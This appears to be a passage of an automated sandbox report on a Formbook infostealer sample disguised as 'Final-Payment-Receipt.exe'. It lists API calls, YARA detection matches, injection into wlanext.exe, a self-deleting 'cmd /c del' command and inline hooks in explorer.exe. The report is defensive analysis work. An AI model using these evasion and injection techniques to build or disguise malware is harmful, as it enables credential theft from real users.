          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759710 NtQueryInformationToken,LdrInitializeThunk,3_2_03759710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759FE0 NtCreateMutant,LdrInitializeThunk,3_2_03759FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759780 NtMapViewOfSection,LdrInitializeThunk,3_2_03759780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03759660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759650 NtQueryValueKey,LdrInitializeThunk,3_2_03759650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_037596E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037596D0 NtCreateKey,LdrInitializeThunk,3_2_037596D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759540 NtReadFile,LdrInitializeThunk,3_2_03759540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037595D0 NtClose,LdrInitializeThunk,3_2_037595D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759B00 NtSetValueKey,3_2_03759B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375A3B0 NtGetContextThread,3_2_0375A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A20 NtResumeThread,3_2_03759A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A10 NtQuerySection,3_2_03759A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A00 NtProtectVirtualMemory,3_2_03759A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A80 NtOpenDirectoryObject,3_2_03759A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759950 NtQueueApcThread,3_2_03759950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599D0 NtCreateProcessEx,3_2_037599D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375B040 NtSuspendThread,3_2_0375B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759820 NtEnumerateKey,3_2_03759820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037598F0 NtReadVirtualMemory,3_2_037598F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037598A0 NtWriteVirtualMemory,3_2_037598A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375A770 NtOpenThread,3_2_0375A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759770 NtSetInformationFile,3_2_03759770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759760 NtOpenProcess,3_2_03759760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759730 NtQueryVirtualMemory,3_2_03759730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375A710 NtOpenProcessToken,3_2_0375A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037597A0 NtUnmapViewOfSection,3_2_037597A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759670 NtQueryInformationProcess,3_2_03759670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759610 NtEnumerateValueKey,3_2_03759610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759560 NtWriteFile,3_2_03759560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0375AD30 NtSetContextThread,3_2_0375AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759520 NtWaitForSingleObject,3_2_03759520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037595F0 NtQueryInformationFile,3_2_037595F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9EA0 NtClose,3_2_02EC9EA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9E20 NtReadFile,3_2_02EC9E20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9F50 NtAllocateVirtualMemory,3_2_02EC9F50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9D70 NtCreateFile,3_2_02EC9D70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9E1F NtReadFile,3_2_02EC9E1F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9F4C NtAllocateVirtualMemory,3_2_02EC9F4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC9DC2 NtCreateFile,3_2_02EC9DC2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_008BC2B00_2_008BC2B0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_008B99700_2_008B9970
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_0492CBE80_2_0492CBE8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_049280A00_2_049280A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_04926E980_2_04926E98
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_04926EA80_2_04926EA8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_0492CBDA0_2_0492CBDA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E74F00_2_055E74F0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E01D00_2_055E01D0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E01E00_2_055E01E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E74E00_2_055E74E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E6A500_2_055E6A50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E6A410_2_055E6A41
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041D3C11_2_0041D3C1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041E5DA1_2_0041E5DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409E3D1_2_00409E3D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D41201_2_013D4120
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BF9001_2_013BF900
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF1_2_013D99BF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA8301_2_013DA830
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014710021_2_01471002
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148E8241_2_0148E824
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A01_2_013E20A0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014828EC1_2_014828EC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB0901_2_013CB090
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014820A81_2_014820A8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0145CB4F1_2_0145CB4F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA3091_2_013DA309
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01482B281_2_01482B28
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DAB401_2_013DAB40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EEBB01_2_013EEBB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147DBD21_2_0147DBD2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014703DA1_2_014703DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E31_2_014623E3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A1_2_013DEB9A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B1_2_013E138B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EABD81_2_013EABD8
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB2361_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146FA2B1_2_0146FA2B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014822AE1_2_014822AE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B0D201_2_013B0D20
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481D551_2_01481D55
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01482D071_2_01482D07
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014825DD1_2_014825DD
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E25811_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D821_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E01_2_013CD5E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147D4661_2_0147D466
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C841F1_2_013C841F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB4771_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014744961_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148DFCE1_2_0148DFCE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481FF11_2_01481FF1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D6E301_2_013D6E30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D56001_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147D6161_2_0147D616
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01482EF71_2_01482EF7
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01461EB61_2_01461EB6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373AB403_2_0373AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037BCB4F3_2_037BCB4F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E2B283_2_037E2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A3093_2_0373A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C23E33_2_037C23E3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D03DA3_2_037D03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374ABD83_2_0374ABD8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037DDBD23_2_037DDBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374EBB03_2_0374EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373EB9A3_2_0373EB9A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0374138B3_2_0374138B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373B2363_2_0373B236
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037CFA2B3_2_037CFA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D4AEF3_2_037D4AEF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E22AE3_2_037E22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037341203_2_03734120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0371F9003_2_0371F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037399BF3_2_037399BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373A8303_2_0373A830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037EE8243_2_037EE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D10023_2_037D1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E28EC3_2_037E28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037420A03_2_037420A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E20A83_2_037E20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372B0903_2_0372B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E1FF13_2_037E1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037EDFCE3_2_037EDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03736E303_2_03736E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037DD6163_2_037DD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037356003_2_03735600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E2EF73_2_037E2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037C1EB63_2_037C1EB6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E1D553_2_037E1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03710D203_2_03710D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E2D073_2_037E2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372D5E03_2_0372D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037E25DD3_2_037E25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037425813_2_03742581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D2D823_2_037D2D82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0373B4773_2_0373B477
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037DD4663_2_037DD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0372841F3_2_0372841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037D44963_2_037D4496
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB9E403_2_02EB9E40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB9E3D3_2_02EB9E3D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB2FB03_2_02EB2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECE5DA3_2_02ECE5DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EB2D903_2_02EB2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0371B150 appears 145 times
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: String function: 013BB150 appears 145 times
          Source: Final-Payment-Receipt.exe, 00000000.00000000.224938714.000000000009A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000000.00000002.236173671.0000000005570000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263682500.000000000163F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000000.230648547.000000000095A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exe, 00000001.00000002.263300020.0000000001382000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs Final-Payment-Receipt.exe
          Source: Final-Payment-Receipt.exeBinary or memory string: OriginalFilenameF5NI.exe4 vs Final-Payment-Receipt.exe
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Final-Payment-Receipt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_01
          Source: Final-Payment-Receipt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Final-Payment-Receipt.exeReversingLabs: Detection: 34%
          Source: unknownProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Final-Payment-Receipt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Final-Payment-Receipt.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Final-Payment-Receipt.exe, 00000001.00000002.263431017.00000000014AF000.00000040.00000001.sdmp, wlanext.exe, 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Final-Payment-Receipt.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 0_2_055E556E push eax; ret 0_2_055E556F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041B11C push es; iretd 1_2_0041B11D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040E3C1 pushad ; ret 1_2_0040E3DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040E417 pushad ; ret 1_2_0040E3DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00417619 pushfd ; ret 1_2_0041761D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CEC5 push eax; ret 1_2_0041CF18
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CF7C push eax; ret 1_2_0041CF82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CF12 push eax; ret 1_2_0041CF18
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0041CF1B push eax; ret 1_2_0041CF82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0140D0D1 push ecx; ret 1_2_0140D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0376D0D1 push ecx; ret 3_2_0376D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECDA3E push 00000072h; ret 3_2_02ECDA40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EBE3C1 pushad ; ret 3_2_02EBE3DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECB11C push es; iretd 3_2_02ECB11D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCEC5 push eax; ret 3_2_02ECCF18
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EC7619 pushfd ; ret 3_2_02EC761D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCF7C push eax; ret 3_2_02ECCF82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCF1B push eax; ret 3_2_02ECCF82
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02ECCF12 push eax; ret 3_2_02ECCF18
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_02EBE417 pushad ; ret 3_2_02EBE3DA
          Source: initial sampleStatic PE information: section name: .text entropy: 7.8171947974

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
